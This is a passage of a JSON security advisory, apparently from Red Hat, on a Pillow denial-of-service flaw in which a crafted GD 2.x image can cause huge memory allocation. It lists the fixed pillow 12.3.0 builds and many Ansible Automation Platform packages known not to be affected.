"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497455"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing a specially crafted GD 2.x image file. The GdImageFile._open() function reads image dimensions without proper validation, leading to excessive memory allocation. This can result in a Denial of Service (DoS) due to C-heap exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted GD 2.x image file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A denial-of-service vulnerability was found in Pillow\u0027s GdImageFile plugin. The GdImageFile._open() function reads image dimensions from GD 2.x file headers and stores them without performing a decompression bomb check. A crafted .gd file of approximately 1 KB can trigger an unchecked 4.3 GB C-heap allocation, potentially crashing the process or exhausting memory on systems with insufficient resources. This issue is fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
